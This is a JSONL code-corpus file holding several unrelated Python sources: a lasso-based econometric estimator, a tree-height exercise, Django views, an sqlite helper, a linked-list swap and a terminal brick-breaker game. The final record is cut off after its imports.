+{"seq_id":"23829995","text":"#stage 1 function\nimport numpy as np\nimport pandas as pd\nbase = \"/Users/max/Documents/ag_production_functions/code/riesz_representer/rr_python/\" \nimport os\nimport sys\nimport scipy.sparse as sc_sparse\nfrom scipy.stats import norm\nimport copy\n\nsys.path.append(os.path.abspath(base))\nimport config\nimport primitives\n\ndef RMD_dantzig(M, G, D, _lambda=0, sparse=True):\n return \"not yet implemented; use RMD_lasso instead \"\n\ndef RMD_lasso(M, G, D, _lambda=0, control = {\"max_iter\":1000, \"optTol\":1e-5, \"zeroThreshold\":1e-6},\n beta_start = None):\n p = G.shape[1] # num columns \n Gt = G\n Mt = M\n L = np.concatenate([np.array([config.l]), np.ones(p-1)])\n lambda_vec = _lambda*L*D\n if beta_start is None: # Warm start; allows passing in previous beta\n beta = np.zeros(p)\n else:\n beta = beta_start\n wp = beta\n mm = 1\n while mm < control['max_iter']:\n beta_old = copy.deepcopy(beta)\n for j in range(p):\n rho = Mt[j] - Gt[j, :] @ beta + Gt[j,j]*beta[j]\n z = Gt[j,j]\n if np.isnan(rho):\n beta[j] = 0\n continue\n if rho < -1 * lambda_vec[j]:\n beta[j] = (rho+lambda_vec[j])/z\n if (np.abs(rho) <= lambda_vec[j]):\n beta[j] = 0\n if (rho > lambda_vec[j]):\n beta[j] = (rho-lambda_vec[j])/z\n wp = np.c_[wp, beta]\n if (np.nansum(np.abs(beta - beta_old)) < control['optTol']):\n break\n mm = mm + 1\n w = beta\n w[abs(w) < control['zeroThreshold']] = 0\n return w, wp, mm # returns coefficients, list of past coefficients, and number of steps \n\ndef get_D(Y,X,X_up,X_down,delta,m,rho_hat):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n df = np.zeros((p, n))\n for i in range(n):\n df[:, i] = X[i, :] * np.array(rho_hat @ X[i, :]) - m(Y[i], X[i, :], X_up[i, :], X_down[i, :], delta, primitives.b)\n df = df**2\n D2 = np.mean(df, 1) # Takes row means of df\n D = np.sqrt(D2)\n return D\n\n# get_D <- function(Y,X,X.up,X.down,delta,m,rho_hat){\n# n=dim(X)[1]\n# p=dim(X)[2]\n \n# df=matrix(0,p,n)\n# for (i in 1:n){\n# df[,i]=X[i,]*as.vector(rho_hat %*% X[i,])-m(Y[i],X[i,],X.up[i,],X.down[i,],delta,b)\n# }\n# df=df^2\n# D2=rowMeans(df)\n \n# D=sqrt(D2)\n# return(D) #pass around D as vector\n# }\n\n\n\ndef RMD_stable(Y,X,X_up,X_down,delta,p0,D_LB,D_add,max_iter,is_alpha,is_lasso):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n\n # First, find low-dimensional moments\n X0 = X[:, 0:p0]\n X0_up = X_up[:, 0:p0]\n X0_down = X_down[:, 0:p0]\n M_hat0, N_hat0, G_hat0, B0 = primitives.get_MNG(Y, X0, X0_up, X0_down, delta)\n\n # initial estimate\n rho_hat0 = np.linalg.solve(G_hat0, M_hat0)\n rho_hat = np.concatenate([rho_hat0, np.zeros(p - G_hat0.shape[1])]) \n beta_hat0 = np.linalg.solve(G_hat0, N_hat0)\n beta_hat = np.concatenate([beta_hat0, np.zeros(p - G_hat0.shape[1])]) \n\n # Full moments\n M_hat, N_hat, G_hat, B = primitives.get_MNG(Y, X, X_up, X_down, delta)\n # penalty term \n _lambda = config.c * norm.ppf(1 - config.alpha / (2 * p)) / np.sqrt(n)\n if is_alpha:\n ###########\n # alpha_hat\n ###########\n diff_rho=1\n k=1\n while (diff_rho>config.tol) & (k<=max_iter):\n # previous 
values\n rho_hat_old=copy.deepcopy(rho_hat)\n \n # normalization\n D_hat_rho=get_D(Y,X,X_up,X_down,delta,primitives.m_diff,rho_hat_old)\n D_hat_rho=np.maximum(D_LB,D_hat_rho) \n D_hat_rho=D_hat_rho+D_add\n if is_lasso:\n rho_hat = RMD_lasso(M_hat, G_hat, D_hat_rho, _lambda)[0]\n else:\n return \"dantzig selector not implemented\"\n beta_hat = RMD_dantzig(M_hat, G_hat, D_hat_rho, _lambda)[0]\n # difference\n diff_rho=primitives.two_norm(rho_hat-rho_hat_old)\n k=k+1\n print('k: ' + str(k))\n return rho_hat\n else:\n ###########\n # gamma_hat\n ###########\n diff_beta=1\n k=0\n while (diff_beta>config.tol) & (k<=max_iter):\n # previous values\n beta_hat_old=copy.deepcopy(beta_hat)\n \n # normalization\n D_hat_beta=get_D(Y,X,X_up,X_down,delta,primitives.m2,beta_hat_old)\n D_hat_beta=np.maximum(D_LB,D_hat_beta) # What is this? \n D_hat_beta=D_hat_beta+D_add\n if is_lasso:\n beta_hat = RMD_lasso(N_hat, G_hat, D_hat_beta, _lambda)[0]\n else:\n return \"dantzig selector not implemented\"\n beta_hat = RMD_dantzig(N_hat, G_hat, D_hat_beta, _lambda)[0]\n # difference\n diff_beta=primitives.two_norm(beta_hat-beta_hat_old)\n k=k+1\n print('k: ' + str(k))\n return beta_hat\n\narg_Forest = {\"clas_nodesize\":1, \"reg_nodesize\":5, \"ntree\":1000, \"na_action\":\"na_omit\", \"replace\":True}\narg_Nnet = {'size':8, 'maxit':1000, 'decay':0.01, 'MaxNWts':10000, 'trace':False}\n\ndef get_stage_1(Y,X,X_up,X_down,delta,p0,D_LB,D_add,max_iter,alpha_estimator,gamma_estimator):\n n = X.shape[0] # num rows\n p = X.shape[1] # num columns\n MNG = primitives.get_MNG(Y, X, X_up, X_down, delta)\n B = MNG[3]\n\n ###########\n # alpha hat\n ###########\n rho_hat = RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=1, is_lasso=(alpha_estimator == 'lasso'))\n def alpha_hat(x):\n return primitives.b(x) @ rho_hat\n\n ###########\n # gamma hat\n ###########\n if gamma_estimator == \"dantzig\":\n beta_hat=RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=0, is_lasso=0)\n def gamma_hat(x):\n return primitives.b(x) @ beta_hat\n elif gamma_estimator == \"lasso\":\n beta_hat=RMD_stable(Y, X, X_up, X_down, delta, p0, D_LB, D_add, max_iter,\n is_alpha=0, is_lasso=1)\n def gamma_hat(x):\n return primitives.b(x) @ beta_hat\n elif gamma_estimator == \"frst\":\n return \"random forest not implemented\"\n elif gamma_estimator == \"nnet\":\n return \"neural net not implemented \"\n return alpha_hat, gamma_hat \n\n# get_stage1<-function(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,alpha_estimator,gamma_estimator){\n \n# n=dim(X)[1]\n# p=dim(X)[2]\n# MNG<-get_MNG(Y,X,X.up,X.down,delta)\n# B=MNG[[4]]\n \n# ###########\n# # alpha hat\n# ###########\n# if(alpha_estimator==0){ # dantzig\n \n# rho_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,1,0)\n# alpha_hat<-function(x){\n# return(b(x)%*%rho_hat)\n# }\n \n# } else if(alpha_estimator==1){ # lasso\n \n# rho_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,1,1)\n# alpha_hat<-function(x){\n# return(b(x)%*%rho_hat)\n# }\n \n# }\n \n# ###########\n# # gamma hat\n# ###########\n# if(gamma_estimator==0){ # dantzig\n \n# beta_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,0,0)\n# gamma_hat<-function(x){\n# return(b(x)%*%beta_hat)\n# }\n \n# } else if(gamma_estimator==1){ # lasso\n \n# beta_hat=RMD_stable(Y,X,X.up,X.down,delta,p0,D_LB,D_add,max_iter,0,1)\n# gamma_hat<-function(x){ \n# return(b(x)%*%beta_hat)\n# }\n \n# } else if(gamma_estimator==2){ # random forest\n \n# forest<- do.call(randomForest, 
append(list(x=B,y=Y), arg_Forest))\n# gamma_hat<-function(x){\n# return(predict(forest,newdata=b(x), type=\"response\"))\n# }\n \n# } else if(gamma_estimator==3){ # neural net\n \n# # scale down, de-mean, run NN, scale up, remean so that NN works well\n# maxs_B <- apply(B, 2, max)\n# mins_B <- apply(B, 2, min)\n \n# maxs_Y<-max(Y)\n# mins_Y<-min(Y)\n \n# # hack to ensure that constant covariates do not become NA in the scaling\n# const=maxs_B==mins_B\n# keep=(1-const)*1:length(const)\n \n# NN_B<-B\n# NN_B[,keep]<-scale(NN_B[,keep], center = mins_B[keep], scale = maxs_B[keep] - mins_B[keep])\n \n# NN_Y<-scale(Y, center = mins_Y, scale = maxs_Y - mins_Y)\n \n# nn<- do.call(nnet, append(list(x=NN_B,y=NN_Y), arg_Nnet)) #why is it degenerate with fitted.values=1?\n# gamma_hat<-function(x){\n \n# test<-t(as.vector(x))\n# NN_b<-test\n# NN_b[,keep]<-scale(t(NN_b[,keep]), \n# center = mins_B[keep], \n# scale = maxs_B[keep] - mins_B[keep])\n \n# NN_Y_hat<-predict(nn,newdata=NN_b)\n# Y_hat=NN_Y_hat*(maxs_Y-mins_Y)+mins_Y\n \n# return(Y_hat)\n# }\n \n# }\n \n# return(list(alpha_hat,gamma_hat))\n \n# }\n","sub_path":"rr_python/stage_1.py","file_name":"stage_1.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"238707414","text":"#Python3\n#week -1 - assign2\nimport sys, threading\nsys.setrecursionlimit(10**7) # max depth of recursion\nthreading.stack_size(2**27) # new thread will get stack of such size\ndef ComputeHeight(maxiheight,li,a,count,current):\n if len(li) == 0:\n return maxiheight,li,a,1\n if li.get(current) == None:\n return maxiheight,li,a,1\n b = li[current]\n a[current] = li[current]\n del li[current]\n for i in b:\n count = count + 1\n maxiheight = max(maxiheight,count)\n if li.get(i) !=None:\n maxiheight,li,a,count = ComputeHeight(maxiheight,li,a,count,i)\n count = count -1\n else:\n count = count -1\n return maxiheight,li,a,count\n\nn = int(input())\nnodes = list(map(int,input().split()))\nli ={}\nc =0 \nk =[]\nfor i in range(n):\n if i != n-1 and nodes[i] == nodes[i+1]:\n k.append(i)\n else:\n if nodes[i] == -1:\n c = i\n else:\n if li.get(nodes[i]) == None:\n li[nodes[i]] = k + [i]\n else:\n li[nodes[i]] = li[nodes[i]] + k + [i]\n k = []\nmaxiheight,li,a,count = ComputeHeight(1,li,{},1,c)\nprint(maxiheight)\n\n","sub_path":"C2 - Week1/tree1.py","file_name":"tree1.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389582106","text":"from django.shortcuts import render_to_response, HttpResponse\nfrom news.models import News, Slider\nfrom projects.models import Project\nfrom anons.models import Anons\nfrom publications.models import Publications\nfrom analytics.models import Analytics\nfrom .util import to_json, get_db_data, union, get_page\n\nfrom haystack.query import SearchQuerySet\n\n\ndef index_view(request):\n news = News.objects.all()[:4]\n projects = Project.objects.all()[:3]\n slider = Slider.objects.all()[:3]\n anons = Anons.objects.all()[:3]\n analytics = Analytics.objects.all()[:5]\n publications = Publications.objects.all()[:5]\n return render_to_response('html/index.html', {\"news\": news, \"anons\": anons,\n \"projects\": projects,\n \"analytics\": union(analytics, publications, attr='pub_date', sort=True, reverse=True)[:5],\n \"slider\": slider})\n\n\ndef ajax_index_news(request, start, number):\n if request.method == 'GET':\n mimetype = 'application/json'\n news = 
get_db_data(start, number, News)\n return HttpResponse(to_json(news), mimetype)\n\n\ndef ajax_index_projects(request, start, number):\n if request.method == 'GET':\n mimetype = 'application/json'\n project = get_db_data(start, number, Project, carousel=True)\n return HttpResponse(to_json(project), mimetype)\n\n\ndef search(request):\n set = SearchQuerySet().filter(content=request.GET['q'])\n page = get_page(set, 3, request.GET['page'])\n return render_to_response(\"search/search.html\", {\"page\": page, \"query\": request.GET['q']})\n","sub_path":"ITDR/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21446582","text":"import sqlite3\n\nclass BaseDeDatos:\n url_base_de_datos = 'plataforma.db'\n\n def _crear_conexion(self):\n try:\n self.conexion = sqlite3.connect(BaseDeDatos.url_base_de_datos)\n except Exception as e:\n print(e)\n\n def _cerrar_conexion(self):\n self.conexion.close()\n self.conexion = None\n\n def ejecutar_sql(self, sql):\n self._crear_conexion()\n cur = self.conexion.cursor()\n cur.execute(sql)\n\n filas = cur.fetchall()\n\n self.conexion.commit()\n self._cerrar_conexion()\n\n return filas\n\n\n","sub_path":"datos/base_de_datos.py","file_name":"base_de_datos.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"69000810","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {ListNode} head\n # @return {ListNode}\n def swapPairs(self, head):\n old = ListNode(0)\n old.next = head\n r = old\n while head is not None:\n if head.next is not None:\n snd = head.next\n head.next = snd.next\n snd.next = head\n old.next = snd\n old = old.next.next\n head = head.next\n return r.next\n\nhead = ListNode(1)\nhead.next = ListNode(2)\nhead.next.next = ListNode(3)\nhead.next.next.next = ListNode(4)\ns = Solution()\nr = s.swapPairs(head)\nwhile r is not None:\n print(r.val)\n r = r.next","sub_path":"_24.py","file_name":"_24.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"586792031","text":"\"\"\"\ncode to run the game\n\"\"\"\n\nimport time\nimport colorama\nimport numpy as np\nimport random\nimport config\nimport util\nimport graphics\n\nfrom screen import Screen\nfrom objects import Paddle, Ball, Brick, BrickArray, ExtraBalls, UFO\nfrom boosts import Bullet, Bomb\n\nclass Game:\n \n def __init__(self):\n print(\"\\033[?25l\\033[2J\", end='')\n self.screen = Screen()\n self.paddle = Paddle(graphics.PADDLE)\n self.ball = Ball()\n # self.brickarr = self.add_bricks()\n\n self.is_over = False\n self.frame_count = 0\n self.level = 1\n\n self.ufo = UFO(self)\n\n self.__objects = {\n \"ball\": [self.ball],\n \"paddle\": [self.paddle],\n \"bricks\": [],\n \"boosts\": [],\n \"boost_multiplier\": [],\n \"boost_shrink\": [],\n \"boost_expand\": [],\n \"boost_grab\": [],\n \"boost_fast\": [],\n \"boost_thru\": [],\n \"boost_shoot\": [],\n \"extra_balls\": [],\n \"bullets\": [],\n \"bombs\": [],\n \"ufo\": [self.ufo]\n }\n\n self.__colliders = [\n (\"ball\", \"paddle\", True),\n (\"ball\", \"bricks\", True),\n (\"boosts\", \"paddle\", False),\n (\"extra_balls\", \"paddle\", True),\n (\"extra_balls\", \"bricks\", True),\n (\"bullets\", \"bricks\", False),\n (\"bombs\", \"paddle\", 
False),\n (\"ball\", \"ufo\", True)\n ]\n\n self.thru = False\n self.grab = False\n self.held = False\n self.reflect = False\n self.fast = False\n self.exp = False\n self.shrink = False\n self.shoot = False\n self.num = 0\n self.multiplier_on = False\n\n def clear(self):\n self.screen.clear()\n # sp.call(\"clear\", shell=True)\n print(\"\\033[0;0H\")\n\n def start(self):\n kb = util.KBHit()\n self.add_bricks()\n\n _st = time.time()\n ut = _st\n bt = _st\n\n while True:\n if self.is_over:\n break\n\n self.frame_count += 1\n time.sleep(config.DELAY)\n self.clear()\n _ct = time.time()\n\n if _ct > ut+10:\n for brick in self.__objects[\"bricks\"]:\n brick.update_position()\n if (brick.position > config.PADDLE_Y-np.array([0,2])).all():\n config.LIVES=0\n for boost in self.__objects[\"boosts\"]:\n boost.update_position()\n\n ut = _ct\n\n self.paddle.check_update()\n if self.level == 3:\n self.ufo.check_update()\n if _ct > bt + 5:\n self.__objects[\"bombs\"].append(Bomb(np.array([self.ufo.position[0] + self.ufo.width//2, self.ufo.position[1]])))\n bt = _ct\n\n thru_ball_count = 0\n for boost in self.__objects[\"boost_thru\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_thru\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n thru_ball_count -= 1\n self.__objects[\"boost_thru\"].remove(boost)\n else:\n thru_ball_count += 1\n if thru_ball_count > 0:\n self.thru = True\n else:\n self.thru = False \n\n\n paddle_grab_count = 0\n for boost in self.__objects[\"boost_grab\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_grab\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n paddle_grab_count -= 1\n self.__objects[\"boost_grab\"].remove(boost)\n else:\n paddle_grab_count += 1\n if paddle_grab_count > 0:\n self.grab = True\n else:\n self.grab = False \n\n\n fast_ball_count = 0\n for boost in self.__objects[\"boost_fast\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_fast\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n fast_ball_count -= 1\n self.__objects[\"boost_fast\"].remove(boost)\n else:\n fast_ball_count += 1\n if fast_ball_count > 0:\n self.fast = True\n else:\n self.fast = False\n\n \n expand_paddle_count = 0\n for boost in self.__objects[\"boost_expand\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_expand\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n expand_paddle_count -= 1\n self.__objects[\"boost_expand\"].remove(boost)\n else:\n expand_paddle_count += 1\n if expand_paddle_count > 0:\n self.exp = True\n else:\n self.exp = False\n\n \n shrink_paddle_count = 0\n for boost in self.__objects[\"boost_shrink\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_shrink\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n shrink_paddle_count -= 1\n self.__objects[\"boost_shrink\"].remove(boost)\n else:\n shrink_paddle_count += 1\n if shrink_paddle_count > 0:\n self.shrink = True\n else:\n self.shrink = False\n\n shoot_bullet_count = 0\n for boost in self.__objects[\"boost_shoot\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_shoot\"].remove(boost)\n if boost.applied:\n if _ct > boost.boost_time:\n boost.applied = False\n 
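# stop counting the expired boost and drop it from the list\n 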
shoot_bullet_count -= 1\n self.__objects[\"boost_shoot\"].remove(boost)\n else:\n shoot_bullet_count += 1\n if shoot_bullet_count > 0:\n self.shoot = True\n else:\n self.shoot = False\n\n if self.shoot and self.shrink:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_SHRUNK_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_SHRUNK_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shoot and self.exp:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_EXPANDED_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_EXPANDED_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shoot:\n self.paddle.rep = util.str_to_array(graphics.SHOOTING_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHOOTING_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.shrink :\n # self.paddle.change(graphics.SHRINK_PADDLE)\n self.paddle.rep = util.str_to_array(graphics.SHRUNK_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.SHRUNK_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n elif self.exp :\n # self.paddle.change(graphics.EXPAND_PADDLE)\n self.paddle.rep = util.str_to_array(graphics.EXPANDED_PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.EXPANDED_PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n\n if not self.exp and not self.shrink and not self.shoot:\n self.paddle.rep = util.str_to_array(graphics.PADDLE)\n self.paddle.color = util.tup_to_array(util.str_to_array(graphics.PADDLE).shape, (colorama.Back.YELLOW, colorama.Fore.WHITE))\n self.paddle.height, self.paddle.width = self.paddle.rep.shape\n\n\n ball_multiplier_count = 0\n for boost in self.__objects[\"boost_multiplier\"]:\n if boost.position[1] > config.PADDLE_Y:\n self.__objects[\"boost_multiplier\"].remove(boost)\n if boost.applied:\n # self.screen.draw(boost)\n if _ct > boost.boost_time:\n boost.applied = False\n ball_multiplier_count -= 1\n self.__objects[\"boost_multiplier\"].remove(boost)\n else:\n ball_multiplier_count += 1\n # self.split = True\n # if len(self.__objects[\"extra_balls\"]) <= 5:\n # self.manage_extra_balls()\n # self.__objects[\"extra_balls\"] += ExtraBalls(self.num).get_items()\n\n self.num = ball_multiplier_count\n # if self.num > 0:\n # self.multiplier_on = False\n # self.balls = 2 ** (ball_multiplier_count - 1)\n self.balls = 1 + len(self.__objects[\"extra_balls\"])\n self.check_balls()\n\n if kb.kbhit():\n if self.manage_keys(kb.getch()):\n print(colorama.Fore.RED + \"YOU QUIT || SCORE: \", config.SCORE)\n break\n kb.clear()\n else:\n kb.clear()\n\n self.detect_collisions() \n \n for boost in self.__objects[\"boosts\"]:\n self.screen.draw(boost)\n\n for brick in self.__objects[\"bricks\"]:\n self.screen.draw(brick)\n\n for extraball in self.__objects[\"extra_balls\"]:\n self.screen.draw(extraball)\n\n for bullet in self.__objects[\"bullets\"]:\n self.screen.draw(bullet)\n\n for bomb in self.__objects[\"bombs\"]:\n self.screen.draw(bomb)\n\n self.screen.draw(self.paddle)\n self.screen.draw(self.ball)\n if self.level == 3:\n if self.ufo.health != 0:\n self.screen.draw(self.ufo)\n 
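# health exhausted: clear the UFO so it is no longer drawn\n 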
else:\n self.__objects[\"ufo\"].clear()\n \n self.screen.show()\n self.show_score(_st, _ct)\n for boost in self.__objects[\"boosts\"]:\n if boost.move:\n boost.update()\n if self.reflect:\n self.ball.reflect()\n self.reflect = False\n if not self.held:\n if self.fast:\n self.ball.update(2)\n else:\n self.ball.update(1)\n\n for bullet in self.__objects[\"bullets\"]:\n bullet.update()\n\n for bomb in self.__objects[\"bombs\"]:\n bomb.update()\n\n for extraball in self.__objects[\"extra_balls\"]:\n if self.reflect:\n extraball.reflect()\n if not self.held:\n if self.fast:\n extraball.update_extraball(2)\n else:\n extraball.update_extraball(1)\n\n def manage_keys(self, ch):\n if ch == config.QUIT_CHAR:\n return True\n\n elif ch == config.RELEASE_CHAR:\n if self.held:\n self.held = False\n self.reflect = True\n\n elif ch == config.SHOOT_CHAR:\n if self.shoot:\n self.shoot_bullet(np.array([self.paddle.position[0]+self.paddle.width//2, self.paddle.position[1]]))\n\n elif ch == config.PASS_CHAR:\n self.level +=1\n config.LEVEL +=1\n self.__objects[\"bricks\"].clear()\n self.add_bricks()\n self.__objects[\"boosts\"].clear()\n\n else:\n self.paddle.move(ch)\n if self.level == 3:\n self.ufo.move(ch)\n if self.held:\n self.ball.move(ch)\n return False\n\n def add_bricks(self):\n self.__objects[\"bricks\"] += BrickArray(self).get_items()\n for brick in self.__objects[\"bricks\"]:\n if brick.has_boost:\n self.__objects[\"boosts\"].append(brick.boost)\n if (brick.boost.rep == util.str_to_array(graphics.BALL_MULTIPLIER)).all():\n self.__objects[\"boost_multiplier\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.SHRINK_PADDLE)).all():\n self.__objects[\"boost_shrink\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.EXPAND_PADDLE)).all():\n self.__objects[\"boost_expand\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.PADDLE_GRAB)).all():\n self.__objects[\"boost_grab\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.FAST_BALL)).all():\n self.__objects[\"boost_fast\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.THRU_BALL)).all():\n self.__objects[\"boost_thru\"].append(brick.boost)\n elif (brick.boost.rep == util.str_to_array(graphics.SHOOT_BULLETS)).all():\n self.__objects[\"boost_shoot\"].append(brick.boost)\n\n def check_balls(self):\n if self.num>1:\n if not self.multiplier_on:\n # if len(self.__objects[\"extra_balls\"]) < self.num:\n self.__objects[\"extra_balls\"] += ExtraBalls(self.balls).get_items() \n self.multiplier_on = True\n elif self.num == 1:\n if not self.multiplier_on:\n self.__objects[\"extra_balls\"] += ExtraBalls(1).get_items()\n self.multiplier_on = True\n\n def shoot_bullet(self, position):\n self.__objects[\"bullets\"].append(Bullet(position))\n\n def show_score(self, st, ct):\n if config.LIVES == 0:\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tGAME OVER, YOU LOST :(\")\n self.is_over = True\n if config.BRICKS_LEFT == 0:\n # print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tYOU WON :)\")\n self.level += 1\n if self.level == 4:\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t\\tYOU WON :)\")\n self.is_over = True\n self.start()\n # self.is_over = True\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"=\"*config.WIDTH)\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"\\t|| BOUNCE ||\\t\\tSCORE: \", config.SCORE, \"\\tBRICKS LEFT: \", config.BRICKS_LEFT, \"\\tTIME: \", int(ct-st), \"\\tLIVES: \", 
\"❤️ \"*config.LIVES, \"\\tLEVEL: \", int(self.level))\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"=\"*config.WIDTH)\n if self.shoot:\n time_left = max(boost.boost_time for boost in self.__objects[\"boost_shoot\"]) - ct\n print(colorama.Back.BLACK + colorama.Style.BRIGHT + \"Shooting time available: \"+ str(time_left))\n\n if config.LEVEL == 3:\n print(\"UFO health: \"+ str(self.ufo.health))\n\n def detect_collisions(self):\n for pairs in self.__colliders:\n for hitter in self.__objects[pairs[0]]:\n for target in self.__objects[pairs[1]]:\n\n if pairs[0] == \"bombs\":\n if hitter.position[1] > config.PADDLE_Y:\n for bomb in self.__objects[\"bombs\"]:\n if hitter == bomb:\n self.__objects[\"bombs\"].remove(hitter)\n\n if pairs[0] == \"boosts\":\n if hitter.position[1] > config.PADDLE_Y:\n hitter.destroy()\n self.__objects[\"boosts\"].remove(hitter)\n\n if pairs[0] == \"extra_balls\":\n if hitter.position[1] > config.PADDLE_Y:\n for ball in self.__objects[\"extra_balls\"]:\n if hitter == ball:\n self.__objects[\"extra_balls\"].remove(hitter)\n \n pos_h = hitter.get_position()\n pos_t = target.get_position()\n\n height_h, width_h = hitter.get_shape()\n height_t, width_t = target.get_shape()\n\n minx = min(pos_h[0], pos_t[0])\n maxx = max(pos_h[0] + width_h, pos_t[0] + width_t)\n\n miny = min(pos_h[1], pos_t[1])\n maxy = max(pos_h[1] + height_h, pos_t[1] + height_t)\n\n if maxx - minx > width_h + width_t \\\n or maxy - miny > height_h + height_t:\n continue\n\n if pairs[0] == \"bullets\":\n self.__objects[\"bullets\"].remove(hitter)\n\n if pairs[0] == \"bombs\":\n self.__objects[\"bombs\"].remove(hitter)\n config.LIVES -= 1\n config.RESET = [True, True, True]\n\n if pairs[1] == \"ufo\":\n self.ufo.health -=1\n \n if pairs[1] == \"bricks\":\n if target.strength != 4:\n config.SCORE += 30\n if target.strength == 1:\n target.destroy()\n if target.has_boost:\n target.boost.move = True\n config.BRICKS_LEFT -= 1\n self.__objects[\"bricks\"].remove(target)\n if target.is_explosive:\n for brick in self.__objects[\"bricks\"]:\n for x in range(max(5, pos_t[0] - 10), min(pos_t[0]+ 20, config.WIDTH-5)):\n # x = pos_t[0]\n for y in range(pos_t[1]-4, pos_t[1]+4):\n # y = pos_t[1]\n if (brick.position == np.array([x, y])).all():\n brick.destroy()\n config.SCORE += 30\n if brick.strength != 4:\n config.SCORE += 10\n config.BRICKS_LEFT -= 1\n\n if brick.has_boost:\n brick.boost.move = True\n self.__objects[\"bricks\"].remove(brick)\n\n else:\n target.strength -= 1\n target.implement_strength()\n\n if pairs[0] == \"boosts\":\n if hitter.active:\n hitter.applied = True\n config.SCORE += 10\n hitter.time = time.time()\n hitter.boost_time = time.time()+10\n hitter.destroy()\n self.__objects[\"boosts\"].remove(hitter)\n for boost in self.__objects[\"boost_multiplier\"]:\n if hitter == boost:\n self.multiplier_on = False \n \n if pairs[2]:\n if not self.thru:\n if pairs[1] == \"bricks\":\n if pos_h[0] == pos_t[0]+4:\n hitter.reflect()\n else:\n hitter.angle_reflect(pos_h[0] - pos_t[0] - 4)\n\n if pairs[1] == \"paddle\" or pairs[1] == \"ufo\":\n if not self.grab:\n if pos_h[0] == pos_t[0]+4:\n hitter.reflect()\n else:\n hitter.angle_reflect(pos_h[0] - pos_t[0] - 4)\n else:\n pos = pos_h\n pos[1] -= 1\n hitter.pause(pos_h)\n self.held = True\n\n","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":22245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"489734401","text":"import mysql.connector\nimport json\n\n\n
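# Telegram notification helpers for maintenance requests stored in the ogm2 database\n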
